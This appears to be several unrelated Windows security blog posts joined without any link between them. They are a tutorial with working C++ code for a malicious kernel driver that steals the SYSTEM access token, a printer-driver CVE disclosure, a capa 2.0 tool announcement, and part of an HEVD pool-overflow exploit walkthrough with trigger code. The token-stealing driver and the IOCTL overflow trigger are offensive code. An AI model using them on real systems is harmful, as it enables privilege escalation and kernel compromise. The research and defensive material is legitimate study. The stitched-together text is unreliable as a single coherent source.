SolomonSklash.io

Stealing Tokens In Kernel Mode With A Malicious Driver

By: Solomon Sklash

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative Spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to steal the access token of a SYSTEM process and assign it to a process of your choosing. However, this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by an _EPROCESS structure, and these structures are linked together in a doubly linked list. This structure is not fully documented by Microsoft, but the ReactOS project, as usual, has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes this is just an implementation detail. The Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting an actual kernel mode vulnerability, I wrote a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes a struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct
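As a rough sketch, the struct passed through the IOCTL might look something like the following. The member names here are illustrative, not necessarily the ones used in the actual driver code.

// Illustrative sketch of the IOCTL input structure described above -
// the real member names in the driver may differ.
typedef struct _TOKEN_STEAL_REQUEST
{
    ULONG SourcePid;    // PID of the process to steal the token from
    ULONG TargetPid;    // PID of the process to elevate
} TOKEN_STEAL_REQUEST, *PTOKEN_STEAL_REQUEST;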

The driver finds the _EPROCESS structure for each PID, locates the Token member of each, and copies the token of the source process into the destination process.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code
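A minimal sketch of such a user mode client is shown below. The device name, IOCTL value, and struct layout are assumptions for illustration only - the real values come from the driver’s source.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Hypothetical IOCTL and device name - the real ones are defined by the driver.
#define IOCTL_STEAL_TOKEN CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

typedef struct _TOKEN_STEAL_REQUEST
{
    ULONG SourcePid;
    ULONG TargetPid;
} TOKEN_STEAL_REQUEST;

int wmain(int argc, wchar_t* argv[])
{
    if (argc != 3)
    {
        wprintf(L"Usage: %ls <PID to steal from> <PID to elevate>\n", argv[0]);
        return 1;
    }

    // Open a handle to the driver's device object by name.
    HANDLE device = CreateFileW(L"\\\\.\\TokenStealer", GENERIC_READ | GENERIC_WRITE,
                                0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        wprintf(L"Could not open device: %lu\n", GetLastError());
        return 1;
    }

    TOKEN_STEAL_REQUEST request;
    request.SourcePid = (ULONG)_wtoi(argv[1]);
    request.TargetPid = (ULONG)_wtoi(argv[2]);

    // Pass both PIDs to the driver via the exposed IOCTL.
    DWORD bytesReturned = 0;
    if (DeviceIoControl(device, IOCTL_STEAL_TOKEN, &request, sizeof(request),
                        NULL, 0, &bytesReturned, NULL))
    {
        wprintf(L"IOCTL sent successfully\n");
    }
    else
    {
        wprintf(L"DeviceIoControl failed: %lu\n", GetLastError());
    }

    CloseHandle(device);
    return 0;
}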

The Driver Code

The code for the token copying is pretty straightforward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token
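Putting the pieces above together, the kernel-side logic boils down to something like the following sketch. The helper and variable names are illustrative, and the 0x4b8 offset is specific to my Windows 10 20H2 test machine - it changes between builds.

#include <ntddk.h>

// Illustrative sketch of the token stealing logic - not the driver's exact code.
// TOKEN_OFFSET is the offset of the Token member in _EPROCESS on this build.
#define TOKEN_OFFSET 0x4b8

NTSTATUS StealToken(ULONG SourcePid, ULONG TargetPid)
{
    PEPROCESS sourceProcess = NULL;
    PEPROCESS targetProcess = NULL;

    // Resolve each PID to the address of its _EPROCESS structure.
    NTSTATUS status = PsLookupProcessByProcessId(ULongToHandle(SourcePid), &sourceProcess);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = PsLookupProcessByProcessId(ULongToHandle(TargetPid), &targetProcess);
    if (!NT_SUCCESS(status))
    {
        ObDereferenceObject(sourceProcess);
        return status;
    }

    // The Token member (an _EX_FAST_REF) lives at a fixed offset within _EPROCESS.
    ULONG_PTR* sourceToken = (ULONG_PTR*)((ULONG_PTR)sourceProcess + TOKEN_OFFSET);
    ULONG_PTR* targetToken = (ULONG_PTR*)((ULONG_PTR)targetProcess + TOKEN_OFFSET);

    // Copy the source process token pointer over the target process token pointer.
    *targetToken = *sourceToken;

    ObDereferenceObject(sourceProcess);
    ObDereferenceObject(targetProcess);
    return STATUS_SUCCESS;
}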

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, which is always 4 on modern versions of Windows. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level lets you defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

SentinelLabs

CVE-2021-3438: 16 Years In Hiding – Millions of Printers Worldwide Vulnerable

By: Asaf Amir

Executive Summary

  • SentinelLabs has discovered a high severity flaw in HP, Samsung, and Xerox printer drivers.
  • Since 2005 HP, Samsung, and Xerox have released millions of printers worldwide with the vulnerable driver.
  • SentinelLabs’ findings were proactively reported to HP on Feb 18, 2021 and are tracked as CVE-2021-3438, marked with CVSS Score 8.8.
  • HP released a security update on May 19th to its customers to address this vulnerability.

As part of our commitment to secure the internet for all users, our researchers have engaged in an open-ended process of vulnerability discovery for targets that impact wide swaths of end users. Our research has been consistently fruitful, particularly in the area of OEM drivers[1, 2]. Many of these drivers come preloaded on devices or get silently dropped when installing some innocuous legitimate software bundle and their presence is entirely unknown to the users. These OEM drivers are often decades old and coded without concern for their potential impact on the overall integrity of those systems.

Our research approach has allowed us to proactively engage with vendors and manufacturers to patch previously unknown vulnerabilities before they can be exploited in the wild. We will continue our efforts to reduce the overall attack surface available to cunning adversaries.

Discovering an HP Printer Driver Vulnerability

Several months ago, while configuring a brand new HP printer, our team came across an old printer driver from 2005 called SSPORT.SYS, thanks once again to an alert from Process Hacker.

This led to the discovery of a high severity vulnerability in HP, Xerox, and Samsung printer driver software that has remained hidden for 16 years. This vulnerability affects a very long list of over 380 different HP and Samsung printer models as well as at least a dozen different Xerox products.

The beginning of a long list of affected HP and Samsung products
A number of Xerox Products are also affected by CVE-2021-3438

Since all of these models are in fact manufactured by HP, we reported the vulnerability to them.

Technical Details

Just by running the printer software, the driver gets installed and activated on the machine regardless of whether you complete the installation or cancel.

Thus, in effect, this driver gets installed and loaded without even asking or notifying the user. Whether you are configuring the printer to work wirelessly or via a USB cable, this driver gets loaded. In addition, it will be loaded by Windows on every boot.

This makes the driver a perfect candidate to target since it will always be loaded on the machine even if there is no printer connected.

The vulnerable function inside the driver accepts data sent from User Mode via IOCTL (Input/Output Control) without validating the size parameter:

The vulnerable function inside the driver

This function copies a string from the user input using strncpy with a size parameter that is controlled by the user. Essentially, this allows attackers to overrun the buffer used by the driver.
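SentinelLabs did not publish the decompiled function, but the vulnerable pattern they describe boils down to something like the sketch below. This is not the actual SSPORT.SYS code - the structure and names are made up to illustrate the bug class.

#include <ntddk.h>
#include <string.h>

// Hypothetical illustration of the bug class described above, NOT the real driver code.
typedef struct _USER_REQUEST
{
    CHAR  Data[64];     // attacker-controlled string sent via the IOCTL
    ULONG Length;       // attacker-controlled size parameter
} USER_REQUEST, *PUSER_REQUEST;

VOID HandleIoctl(PUSER_REQUEST Request)
{
    CHAR kernelBuffer[64];

    // BUG: Length is taken from the user-mode request and never validated
    // against sizeof(kernelBuffer), so a large Length overruns the buffer.
    strncpy(kernelBuffer, Request->Data, Request->Length);
}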

An interesting thing we noticed while investigating this driver is this peculiar hardcoded string: "This String is from Device [email protected]@@@ ".

The hardcoded string in the vulnerable driver

It seems that HP didn’t develop this driver but copied it from a project in Windows Driver Samples by Microsoft that has almost identical functionality; fortunately, the MS sample project does not contain the vulnerability.

Impact

An exploitable kernel driver vulnerability can allow an unprivileged user to escalate to a SYSTEM account and run code in kernel mode (since the vulnerable driver is locally available to anyone). Among the obvious abuses of such vulnerabilities is that they could be used to bypass security products.

Successfully exploiting a driver vulnerability might allow attackers to potentially install programs, view, change, encrypt or delete data, or create new accounts with full user rights. Weaponizing this vulnerability might require chaining other bugs as we didn’t find a way to weaponize it by itself given the time invested.

Suggestions

Generally speaking, to reduce the attack surface exposed by device drivers with IOCTL handlers, developers should enforce strong ACLs when creating kernel device objects, validate user input, and avoid exposing a generic interface to kernel mode operations.
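For instance, one way to apply a strong ACL is to create the device object with an explicit SDDL string via IoCreateDeviceSecure, as in the sketch below. The device name, GUID, and SDDL policy shown (SYSTEM and Administrators only) are placeholders for illustration.

#include <ntddk.h>
#include <wdmsec.h>   // IoCreateDeviceSecure (link against wdmsec.lib)

// Sketch: create a device object that only SYSTEM and the Administrators
// group can open, instead of a world-accessible device.
NTSTATUS CreateRestrictedDevice(PDRIVER_OBJECT DriverObject, PDEVICE_OBJECT* DeviceObject)
{
    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(L"\\Device\\ExampleDevice");

    // D:P(A;;GA;;;SY)(A;;GA;;;BA) = generic-all for SYSTEM and built-in Administrators only.
    UNICODE_STRING sddl = RTL_CONSTANT_STRING(L"D:P(A;;GA;;;SY)(A;;GA;;;BA)");

    // Placeholder class GUID - a real driver should use its own generated GUID.
    static const GUID deviceClassGuid =
        { 0x12345678, 0x1234, 0x1234, { 0x12, 0x34, 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc } };

    return IoCreateDeviceSecure(DriverObject,
                                0,                        // no device extension
                                &deviceName,
                                FILE_DEVICE_UNKNOWN,
                                FILE_DEVICE_SECURE_OPEN,  // also apply security to namespace opens
                                FALSE,                    // not exclusive
                                &sddl,
                                &deviceClassGuid,
                                DeviceObject);
}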

Remediation

This vulnerability and its remedies are described in HP Security Advisory HPSBPI03724 and Xerox Advisory Mini Bulletin XRX21K. We recommend that HP/Samsung/Xerox customers, both enterprise and consumer, apply the patch as soon as possible.

To mitigate this issue, users should follow this link, look for their printer model, and download the patch file as shown in the picture:

Some Windows machines may already have this driver without even running a dedicated installation file, since the driver comes with Microsoft Windows via Windows Update:

The driver is marked as “File Distributed by Microsoft” in VirusTotal

Note: Not all affected products were initially listed on the advisory page. We initially conducted a small sample test and found other products vulnerable, so we recommend further verification.

Conclusion

This high severity vulnerability, which has been present in HP, Samsung, and Xerox printer software since 2005, affects millions of devices and likely millions of users worldwide. Similar to previous vulnerabilities we have disclosed that remained hidden for 12 years (1, 2), the impact this could have on users and enterprises that fail to patch is far-reaching and significant.

While we haven’t seen any indicators that this vulnerability has been exploited in the wild so far, with millions of vulnerable printers currently deployed it is inevitable that if attackers weaponize this vulnerability they will seek out those that have not taken the appropriate action.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

18 Feb, 2021 – Initial report.
23 Feb, 2021 – We notified HP that the same issue exists in Samsung and Xerox printers.
19 May, 2021 – HP released an advisory for CVE-2021-3438.
20 May, 2021 – We notified HP that the “affected products” listing is incomplete and provided extra information.
01 Jun, 2021 – HP updated the list of affected products.

Threat Research

capa 2.0: Better, Faster, Stronger

By: William Ballenthin

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and check out the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it’s not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license), we have spent significant time creating a comprehensive FLIRT signature set for the common malware analysis use case. The signatures come included with capa and are also available on our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Connor McGarr

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

By: Connor McGarr

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here, starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining that information leak with the bug outlined in this post, a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why, in my estimation, the scope of techniques for pool corruption in the age of the segment heap has lessened since the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a preprocessor directive that makes this value 16 on a 64-bit Windows machine, which we are testing from. We now know that the pool chunk that will be allocated by the call to ExAllocatePoolWithTag within TriggerBufferOverflowNonPagedPoolNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.
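Paraphrasing the source, the flow of the vulnerable function looks roughly like the sketch below. This is not HEVD’s verbatim code - error handling and the __try/__except wrapper are omitted, and POOL_BUFFER_SIZE/POOL_TAG are assumed to come from HEVD’s headers.

// Paraphrased sketch of the flow described above (not HEVD's verbatim code).
NTSTATUS TriggerBufferOverflowNonPagedPoolNx(PVOID UserBuffer, SIZE_T Size)
{
    // POOL_BUFFER_SIZE is 16 on 64-bit, per BufferOverflowNonPagedPoolNx.h.
    PVOID KernelBuffer = ExAllocatePoolWithTag(NonPagedPoolNx, POOL_BUFFER_SIZE, POOL_TAG);
    if (KernelBuffer == NULL)
    {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    ProbeForRead(UserBuffer, Size, (ULONG)__alignof(UCHAR));

    // BUG: Size is fully attacker-controlled and never compared against
    // POOL_BUFFER_SIZE, so anything past 16 bytes overflows into adjacent
    // chunks in the same kLFH bucket.
    RtlCopyMemory(KernelBuffer, UserBuffer, Size);

    ExFreePoolWithTag(KernelBuffer, POOL_TAG);
    return STATUS_SUCCESS;
}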

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL used to reach the TriggerBufferOverflowNonPagedPoolNx function is 0x0022204B.
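For reference, the trigger code tacked on at the end looks roughly like this (a sketch - hDriver is the HEVD handle already opened earlier in the exploit, and the payload contents are arbitrary at this point):

#include <windows.h>
#include <stdio.h>
#include <string.h>

// Sketch of the trigger added after the kASLR bypass code. hDriver is the
// handle to HEVD opened earlier in the exploit with CreateFileW.
void triggerOverflow(HANDLE hDriver)
{
    // 50 bytes of 'A's - larger than the 16-byte pool allocation.
    char payload[50];
    memset(payload, 0x41, sizeof(payload));

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(hDriver,
                                  0x0022204B,              // TriggerBufferOverflowNonPagedPoolNx
                                  payload, sizeof(payload),
                                  NULL, 0,
                                  &bytesReturned, NULL);
    if (!result)
    {
        printf("[-] DeviceIoControl failed: %lu\n", GetLastError());
    }
}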

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH (which is where our allocation resides, based on the heuristics mentioned in Part 1) being prepended with a _POOL_HEADER structure, we have corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on the call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check occurs once again. This is due to a pool chunk with an invalid header being freed.

This validates that an out-of-bounds write does exist. The question now is, with a kASLR bypass in hand - how do we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap - when exploiting the kLFH specifically - is to find objects that are of the same size as the vulnerable object, contain an interesting member, can be allocated from user mode, and are allocated on the same pool type as the vulnerable object. Recall that the size of the vulnerable object was 16 bytes. The goal now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the parameters specified above. Note again that the toughest part of pool exploitation is finding worthwhile objects.

